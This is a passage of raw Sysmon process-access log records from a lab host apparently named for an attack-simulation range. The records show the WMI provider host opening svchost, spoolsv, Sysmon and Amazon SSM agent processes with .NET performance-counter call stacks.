.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149411Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.349{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149410Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.349{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149409Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.349{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149408Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.348{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149407Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.348{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149406Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.348{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149405Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.348{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149404Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.347{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149403Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149402Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149401Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149400Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149399Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149398Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149397Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149396Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149395Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149394Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149393Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149392Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149391Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149390Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149389Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149388Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.331{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149387Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 